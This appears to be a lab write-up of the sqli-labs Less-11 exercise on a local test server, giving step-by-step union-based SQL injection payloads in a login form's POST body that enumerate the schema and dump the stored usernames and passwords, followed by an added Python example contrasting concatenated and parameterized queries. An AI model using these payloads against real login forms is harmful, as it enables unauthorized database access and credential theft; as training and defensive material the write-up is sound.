http://127.0.0.1/sqli/Less-11/
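Seeing this page, enter admin, admin first and see what happens.
What? It actually returns this result. Next, enter something random.
The response is clearly different this time. So I'll capture the request and work with it.
With the request captured, we can replay it to test.
The database returns an error, and the first thing that comes to mind is that there is a vulnerability here.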
uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit # shows the query has 2 columns
uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit # returns the database name: security
uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit # returns the tables: emails,referers,uagents,users
uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit # returns the columns of the users table
user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password
uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit # returns the username and password data from the users table
Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
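An added example (not from the original post, and not the lab's own PHP): a login query assumed to be built by string concatenation, next to a parameterized version, fed the uname values from the requests above. It uses Python with an in-memory SQLite table as a constructed stand-in for the lab's MySQL users table; all function names are hypothetical.

```python
import sqlite3

# uname values copied from the request bodies on this page.
PAGE_UNAMES = [
    "xxeyuki' order by 2#",
    "xxeyuki' union select 1,database()#",
    "xxeyuki' union select 1,group_concat(username,\"~\",password) from users#",
]

def make_db():
    """Constructed stand-in table holding two rows from the page's output."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("Dumb", "Dumb"), ("admin", "admin")])
    return conn

def login_concat(conn, uname, passwd):
    """Assumed vulnerable shape: form fields pasted into the SQL text."""
    sql = ("SELECT username, password FROM users "
           "WHERE username='" + uname + "' AND password='" + passwd + "' LIMIT 1")
    return conn.execute(sql).fetchone()

def login_bound(conn, uname, passwd):
    """Hardened shape: placeholders keep the fields as data, never as SQL."""
    try:
        return conn.execute(
            "SELECT username, password FROM users "
            "WHERE username=? AND password=? LIMIT 1", (uname, passwd)).fetchone()
    except sqlite3.Error:
        return None  # log server-side; do not echo driver errors to the client

def outcome(fn, conn, uname, passwd):
    """Classify one login attempt as 'row', 'no row' or 'db error'."""
    try:
        return "row" if fn(conn, uname, passwd) else "no row"
    except sqlite3.Error:
        return "db error"

if __name__ == "__main__":
    conn = make_db()
    for u in PAGE_UNAMES:
        # SQLite has no '#' comment (MySQL does), so the concatenated query
        # fails to parse here; the error itself shows the input reached the
        # SQL parser, which is the symptom the post noticed.
        print(outcome(login_concat, conn, u, "xxxxxxx"),
              "|", outcome(login_bound, conn, u, "xxxxxxx"))
```

With bound parameters every value above is compared as a literal username, so the result is an ordinary failed login and no database error reaches the response.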